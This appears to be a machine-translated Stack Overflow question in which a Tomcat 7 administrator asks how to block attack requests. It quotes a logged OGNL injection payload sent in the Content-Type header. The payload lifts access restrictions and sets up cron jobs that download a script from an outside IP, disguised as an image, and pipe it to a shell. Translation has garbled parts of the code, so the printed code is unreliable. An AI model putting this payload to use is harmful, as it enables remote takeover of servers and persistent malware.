我注意到tomcatstdout日志中有人试图用Tomcat 7和Java 1.6.0.45破解服务器暂时我们阻止了广泛的ip以避免攻击,但是在那里应该是一个更好的方法来阻止这些请求。黑客试图通过Tomcat 7上的FileUpload发送脚本
有没有办法来过滤这种类型的请求?
上的日志完整的消息是:
GetRequestHTTP:FileUploadException不包含多部分/格式数据或者多部分/混合流的请求,内容类型报头是%{(#_ ='多部分/表单数据 ')。(#DM = @ ognl.OgnlContext @ DEFAULT_MEMBER_ACCESS)(#_ memberAccess(#_ memberAccess =#分米。):((#容器=#上下文[' com.opensymphony.xwork2.ActionContext.container'] )。(#ognlUtil =#container.getInstance(@ com.opensymphony.xwork2.ognl.OgnlUtil @类))。(#ognlUtil.getExcludedPackageNames()。明确())。(#ognlUtil.getExcludedClasses()。明确() )。(#context.setMemberAccess(#dm))))。(#cmd ='echo“*/20 * * * * wget -O - -q htp://5.188.87.12/icons/logo.jpg | sh \ n */19 * * * * curl http://5.188.87.12/icons/logo.jpg|sh“| crontab - ; wget -O - -q http://5.188.87.12/icons/logo.jpg|sh')。(#iswin =(@ java .lang.System @的getProperty( 'os.name')。toLowerCase()。包含( '赢')))。(#CMDS =(#iswin?{ 'cmd.exe的', '/ C',#CMD} (#p = new java.lang.ProcessBuilder(#cmds))。(#p.redirectErrorStream(true))。(#process = #p.start())。(#ROS =(@ [email protected]()。的getOutputStream()))。(@ [email protected](#process.getInputStream (),#ros))。(#ros.flush())}
Stack Overflow是编程问题的问答网站。你似乎没有提出具体的问题。有关服务器管理的问题可以在https://serverfault.com –
上得到更好的解答我应该删除问题吗? – sirlucas